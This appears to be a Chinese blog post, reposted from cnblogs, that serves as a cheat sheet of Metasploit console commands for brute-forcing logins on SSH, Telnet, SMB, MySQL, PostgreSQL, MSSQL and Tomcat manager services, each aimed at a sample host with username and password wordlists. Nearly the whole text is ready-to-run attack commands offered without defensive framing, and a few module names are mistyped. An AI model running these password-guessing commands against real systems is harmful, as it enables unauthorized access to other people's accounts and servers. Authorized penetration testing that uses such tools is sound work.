• msf爆破


    SSH服务口令猜解:

    msf > use auxiliary/scanner/ssh/ssh_login
    msf auxiliary(ssh_login) > show options
    msf auxiliary(ssh_login) > set RHOSTS 192.168.1.1
    msf auxiliary(ssh_login) > set USER_FILE /root/username.txt
    msf auxiliary(ssh_login) > set PASS_FILE /root/pass.txt
    msf auxiliary(ssh_login) > set THREADS 50
    msf auxiliary(ssh_login) > exploit

    Telnet口令猜解:
    msf > use auxiliary/scanner/telnet/telnet_login
    msf auxiliary(telnet_login) > show options
    msf auxiliary(telnet_login) > set RHOSTS 192.168.1.1
    msf auxiliary(telnet_login) > set USER_FILE /root/username.txt
    msf auxiliary(telnet_login) > set PASS_FILE /root/pass.txt
    msf auxiliary(telnet_login) > exploit

    Samba口令猜解:
    msf > use auxiliary/scanner/smb/smb_login
    msf auxiliary(smb_login) > show options
    msf auxiliary(smb_login) > set RHOSTS 192.168.1.1
    msf auxiliary(ssmb_login) > set USER_FILE /root/username.txt
    msf auxiliary(ssmb_login) > set PASS_FILE /root/pass.txt
    msf auxiliary(ssmb_login) > exploit

    Mysql口令猜解:
    msf > use auxiliary/scanner/mysql/mysql_login
    msf auxiliary(mysql_login) > show options
    msf auxiliary(mysql_login) > set RHOSTS 192.168.1.1
    msf auxiliary(mysql_login) > set USERNAME root
    msf auxiliary(mysql_login) > set PASS_FILE /root/pass.txt
    msf auxiliary(mysql_login) > exploit

    Postgresq口令猜解:
    msf > use auxiliary/scanner/postgres/postgres_login
    msf auxiliary(postgres_login) > show options
    msf auxiliary(postgres_login) > set RHOSTS 192.168.1.1
    msf auxiliary(postgres_login) > set USER_FILE /root/username.txt
    msf auxiliary(postgres_login) > set PASS_FILE /root/pass.txt
    msf auxiliary(postgres_login) > exploit

    Mssql口令猜解:
    msf > use auxiliary/scanner/mssql/mssql_login
    msf auxiliary(mssql_login) > show options
    msf auxiliary(mssql_login) > set RHOSTS 192.168.1.1
    msf auxiliary(mssql_login) > set USER_FILE /root/username.txt
    msf auxiliary(mssql_login) > set PASS_FILE /root/pass.txt
    msf auxiliary(mssql_login) > exploit

    Tomcat口令猜解:
    msf > use auxiliary/scanner/http/tomcat_mgr_login
    msf auxiliary(tomcat_mgr_login) > show options
    msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.1.1
    msf auxiliary(tomcat_mgr_login) > set USER_FILE username.txt
    msf auxiliary(tomcat_mgr_login) > set PASS_FILE /root/pass.txt
    msf auxiliary(tomcat_mgr_login) > exploit

    联系邮箱:yang_s1r@163.com 博客园地址:https://www.cnblogs.com/Yang34/
  • 相关阅读:
    Confluence未授权模板注入/代码执行(CVE-2019-3396)
    Python实现批量处理扫描特定目录
    windows10 缺失 msvcp140.dll 解决办法
    nessus 故障处理
    python 处理json数据
    python 实现两个文本文件内容去重
    python3 实现多域名批量访问特定目录(一)
    python 简单的实现文件内容去重
    python 实现爬取网站下所有URL
    php强大的filter过滤用户输入
  • 原文地址:https://www.cnblogs.com/Yang34/p/11407274.html
Copyright © 2020-2023  润新知